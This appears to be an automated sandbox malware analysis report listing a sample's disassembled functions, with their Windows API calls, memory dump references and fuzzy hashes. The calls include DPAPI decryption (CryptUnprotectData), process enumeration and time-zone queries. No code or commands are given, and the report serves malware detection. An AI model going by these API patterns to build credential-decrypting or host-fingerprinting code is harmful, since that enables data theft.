                                    Function 006872A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006872AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006872B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006872E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00687304
                                    • LocalFree.KERNEL32(?), ref: 0068730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: fa66846703324f6302cc9f5b9ef64b3decb0e18cb02b904865d34718480b6b1f
                                    • Instruction ID: 8b99f054b363b24bf95e0836e034379f82e2bc8505ad3000d045cda521fdd9ac
                                    • Opcode Fuzzy Hash: fa66846703324f6302cc9f5b9ef64b3decb0e18cb02b904865d34718480b6b1f
                                    • Instruction Fuzzy Hash: ED015275A58308BBDB10DFE4DC45F9DB778AB44B01F104144FB05AB2C0C670AB009B65
                                    Function 00699790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006997AE
                                    • Process32First.KERNEL32(006A0ACE,00000128), ref: 006997C2
                                    • Process32Next.KERNEL32(006A0ACE,00000128), ref: 006997D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 006997EC
                                    • CloseHandle.KERNEL32(006A0ACE), ref: 0069980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 1bca1ff3664ce8cb843376a837646ff1acdca5c7833a19a21fd77b9f3e82478b
                                    • Instruction ID: c21a62e72fb884c70d67833db59c0fadd967314f00638b723ee3fd751a2b6110
                                    • Opcode Fuzzy Hash: 1bca1ff3664ce8cb843376a837646ff1acdca5c7833a19a21fd77b9f3e82478b
                                    • Instruction Fuzzy Hash: D901E575A18308ABDF20DFA9DD48BEDBBB9AB09701F10458CE509A6240EB709B40DB60
                                    Function 006A4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: 5f18074259d281b0860551dfea4af7ba4cad347a03f270f1c3272ae9a0ae856d
                                    • Instruction ID: aea4a02d2e81230bae92791408a552c534991da197f11107c355b79adf23854c
                                    • Opcode Fuzzy Hash: 5f18074259d281b0860551dfea4af7ba4cad347a03f270f1c3272ae9a0ae856d
                                    • Instruction Fuzzy Hash: B063337241EBD41ECB27EB3087B62917F67BA1321031D49CEC4C28B5B3C6949E16EB56
                                    Function 00AD8D99 Relevance: 6.6, Strings: 4, Instructions: 1605COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F`{$KX{$Sag$rv~
                                    • API String ID: 0-3432570482
                                    • Opcode ID: 2c65165dfa1942c6d9b55adf67db81243a5cec65d8dff0589176ff795e1695f1
                                    • Instruction ID: 8620f00f5e8a02cb2b4c8449d5337116bbd8088d86255911a2f76a7fe70cfa97
                                    • Opcode Fuzzy Hash: 2c65165dfa1942c6d9b55adf67db81243a5cec65d8dff0589176ff795e1695f1
                                    • Instruction Fuzzy Hash: C4B20AF36082049FD304AE2DDC8567AFBE9EF94720F1A8A3DE6C4C7744E63598058697
                                    Function 00699030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,006851D4,40000001,00000000,00000000,?,006851D4), ref: 00699050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: 1363009dde563b56fc0ee2eabf7b22caf779deb7c990169a0bdda13aad02eeb9
                                    • Instruction ID: dc3f00f169f59f5eacac2b66e9bbc49d6eddd57170136920020e454ca4b67e52
                                    • Opcode Fuzzy Hash: 1363009dde563b56fc0ee2eabf7b22caf779deb7c990169a0bdda13aad02eeb9
                                    • Instruction Fuzzy Hash: 0E11E670204204AFDF04CFA9D885BAA73AEAF89311F10844CF9298B750D676E9419B60
                                    Function 00697B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0DE8,00000000,?), ref: 00697B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,006A0DE8,00000000,?), ref: 00697B54
                                    • wsprintfA.USER32 ref: 00697B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 6edaf1b44e983946ccd973e467f4e5fd1a97916419394147b073e115727e5075
                                    • Instruction ID: e23b95a9c8c4c37cdb6c886de1a456a9d64b63811c54b11fb6de15e4fc2687e0
                                    • Opcode Fuzzy Hash: 6edaf1b44e983946ccd973e467f4e5fd1a97916419394147b073e115727e5075
                                    • Instruction Fuzzy Hash: C0112AB2918218ABCB14DFDAED45BBEF7FCEB4CB12F10411AF615A2280D6395940D7B0
                                    Function 00697BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0142DAE8,00000000,?,006A0DF8,00000000,?,00000000,00000000), ref: 00697BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0142DAE8,00000000,?,006A0DF8,00000000,?,00000000,00000000,?), ref: 00697C0D
                                    • wsprintfA.USER32 ref: 00697C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 3caa018142e811b70b3b358029f40415123ef8e9b94816e9367d19e9e3ca9d16
                                    • Instruction ID: 374ec7fcb5e1a80e5c15039c8ff4e36d440dbaf16b3983d92f156707f3b8af5a
                                    • Opcode Fuzzy Hash: 3caa018142e811b70b3b358029f40415123ef8e9b94816e9367d19e9e3ca9d16
                                    • Instruction Fuzzy Hash: 76118EB1909318EFEB209B55ED45FA9B7B8FB44711F100795F61A932D0DB745A408B50
                                    Function 0099720E Relevance: 5.2, Strings: 4, Instructions: 240COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Dw\$Zb{[${p<${p<
                                    • API String ID: 0-3519044859
                                    • Opcode ID: f870bddbae6d3e5c9066e70dda8b9809cb3f62253f74bd1e80a13553a2f2132a
                                    • Instruction ID: 00b8a2ed6e570808bbee6bf6c922736d80d409faec33c1d5b2bed1d917589a73
                                    • Opcode Fuzzy Hash: f870bddbae6d3e5c9066e70dda8b9809cb3f62253f74bd1e80a13553a2f2132a
                                    • Instruction Fuzzy Hash: 287124F3E082105BE3009A3CDC4576AB7E6EFD4720F1B853DDE88D7784E93998058696
                                    Function 00693970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(0069E120,00000000,00000001,0069E110,00000000), ref: 006939A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00693A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: 34816cc419f13fafecc67ddc7369a0e44b8f2669c699a3e395d88bee4d2657b9
                                    • Instruction ID: c90568a8be702b003f1c80c34f3513e0fe17ff0676ae146d6d4637e6b8b50a31
                                    • Opcode Fuzzy Hash: 34816cc419f13fafecc67ddc7369a0e44b8f2669c699a3e395d88bee4d2657b9
                                    • Instruction Fuzzy Hash: C741E870A44A289FDB24DB58CC95F9BB7B9BB48702F4041D8E618E72E0D7B16E85CF50
                                    Function 0068A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0068A2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0068A2F3
                                    • LocalFree.KERNEL32(?), ref: 0068A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: c54af02b050cd776655319e0c6a3c9db117a9439b2651cac8205229edb1fa4ec
                                    • Instruction ID: 1727402159d6b45303dc2cf8cd7f4a2c3dce83f8ef1d9c44d6f164995567cdca
                                    • Opcode Fuzzy Hash: c54af02b050cd776655319e0c6a3c9db117a9439b2651cac8205229edb1fa4ec
                                    • Instruction Fuzzy Hash: ED11E5B8A04209EFDB04DFA5D884AAEB7B5FB88301F104559FD15A7350D770AE50CB61
                                    Function 006F4BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
